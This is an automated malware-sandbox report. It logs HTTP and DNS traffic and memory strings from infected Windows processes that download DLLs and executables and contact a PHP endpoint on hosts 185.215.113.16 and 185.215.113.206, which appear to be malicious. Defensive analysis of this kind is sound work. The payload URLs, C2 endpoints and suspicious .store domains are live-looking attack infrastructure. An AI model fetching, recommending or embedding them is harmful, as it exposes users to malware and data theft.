Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bloomfilterfiles/ExpandedDomainsFilterGlobal.json HTTP/1.1Host: www.bing.comConnection: keep-aliveCookie: ANON=; MUID=1C457A5C69C96D7328066F6F68476CEB;_RwBf=;Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Fru7Nk9/Plugins/clip.dll HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /Fru7Nk9/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 10 Nov 2024 03:45:33 GMTIf-None-Match: "67302c5d-1b0000"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: 000003.log12.9.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log12.9.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.ldb.9.dr	String found in binary or memory: "www.youtube.com": "{: equals www.youtube.com (Youtube)
Source: 000003.ldb.9.dr	String found in binary or memory: "www.youtube.com": "{:1 equals www.youtube.com (Youtube)
Source: 000003.log12.9.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: navygenerayk.store
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000018.00000002.5411293515.000000000123F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip.dll
Source: skotes.exe, 00000018.00000002.5411293515.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Main
Source: skotes.exe, 00000018.00000002.5411293515.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip.dll:::Mainos.dll
Source: skotes.exe, 00000018.00000002.5411293515.000000000123F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip.dllH
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip64.dll2zl
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Fru7Nk9/Plugins/clip64.dlldzZ
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe2
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exehp
Source: file.exe, 00000000.00000002.2435919050.0000000023272000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe0RF
Source: 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229565339.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe.exe
Source: 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeq
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe$B
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001110000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378497420.0000000000EBA000.00000004.00000010.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3768535304.00000000010FA000.00000004.00000010.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeGB
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001271000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stp
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/steam/random.exet
Source: file.exe, 00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2407206885.0000000000655000.00000040.00000001.01000000.00000003.sdmp, 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.000000000146A000.00000004.00000020.00020000.00000000.sdmp, 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3775621630.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206//
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllf
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllr
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllUe
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/9
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3735385293.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/C:
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/J-
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/P
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3735190194.0000000005C15000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3775896339.0000000005C15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/SSC:
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/U
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/Z
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ad
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&;
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/h
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: file.exe, 00000000.00000002.2435919050.0000000023272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php4
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpBr
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpFirefox
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR;
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpX
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpche
Source: file.exe, 00000000.00000002.2435919050.0000000023272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpie
Source: file.exe, 00000000.00000002.2407206885.0000000000655000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ctionSettingsnlLMEM8
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001175000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/fjnmnfpi
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/i
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/j
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.000000000146A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.2063
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206D
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206RFs
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206f-
Source: file.exe, 00000000.00000002.2407206885.0000000000655000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206lfons
